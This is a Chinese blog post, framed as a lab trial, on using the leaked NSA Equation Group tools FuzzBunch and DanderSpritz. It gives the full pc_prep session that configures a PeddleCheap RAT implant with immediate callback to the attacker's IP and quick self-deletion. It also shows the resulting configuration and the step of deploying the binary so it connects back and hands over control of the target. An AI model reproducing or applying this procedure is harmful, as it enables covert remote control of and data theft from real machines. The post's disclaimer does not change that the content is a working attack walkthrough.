欢迎光临
未来你我一起携手

DanderSpritz远程管理小试 NSA方程式组织

(本博客文章仅做经验分享,请勿用于非法用途。任何因而产生的问题本博客不予负责)

 

DanderSpritz程序需要配合该组织此前放出的FuzzBunch生成日志文件。但初步接触以后,这一步可能可以省略,脱离出来。

下面请看一句话介绍:

DanderSpritz是NSA方程式组织著名的RAT,很多的反病毒厂商都抓到过此RAT的样本,信息收集模块做的特别全。

需要的环境可以从之前泄露的压缩包里找到。首先我们用FuzzBunch框架生成日志文件(第一次先在文件夹下创建一个listeningposts文件夹)然后fb.py 然后输入对方的IP地址192.168.38.107

然后输入自己的IP地址192.168.38.106

靶机:192.168.38.107

攻击:192.168.38.106

配置完毕如图:

DanderSpritz

这里我生成在了

C:\logs\test2008

紧接着运行Start.jar


正确载入之后如图所示


紧接着输入pc_prep(输入pc按TAB可以补全)。选择你要生成的服务端。这里我选择3.

Pick the payload type
3
Update advanced settings
NO
Perform IMMEDIATE CALLBACK?
YES
Enable QUICK SELF-DELETION?
YES
Enter the PC ID [0]
0
Do you want to LISTEN?
YES
Change LISTEN PORTS?
NO
Enter the callback address (127.0.0.1 = no callback) [127.0.0.1]
192.168.38.106
Change CALLBACK PORTS?
NO
Change exe name in version information?
NO
– Pick a key
– 0) Exit
– 1) Create a new key
– 2) Default
Enter the desired option
2
– Configuration:

– <?xml version=’1.0′ encoding=’UTF-8′ ?>
– <PCConfig>
– <Flags>
– <PCHEAP_CONFIG_FLAG_CALLBACK_NOW/>
– <PCHEAP_CONFIG_FLAG_QUICK_DELETE_SELF/>
– </Flags>
– <Id>0x0</Id>
– <CallbackAddress>192.168.38.106</CallbackAddress>
– </PCConfig>

Is this configuration valid
YES
Do you want to configure with FC?
NO
– Configured binary at:
– C:\logs\test2008\z0.0.0.1/Payloads/PeddleCheap_2017_09_07_10h40m28s.609/PC_Level3_exe.configured

然后把C:\logs\test2008\z0.0.0.1/Payloads/PeddleCheap_2017_09_07_10h40m28s.609/PC_Level3_exe.configured改成C:\logs\test2008\z0.0.0.1/Payloads/PeddleCheap_2017_09_07_10h40m28s.609/PC_Level3_exe
然后切换到


接着就会上线。然后会回传服务端信息
下图为:上线回传,我们点击接受以后就会建立链接。即可进行控制

未经允许不得转载:卧栏听雨 » DanderSpritz远程管理小试
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址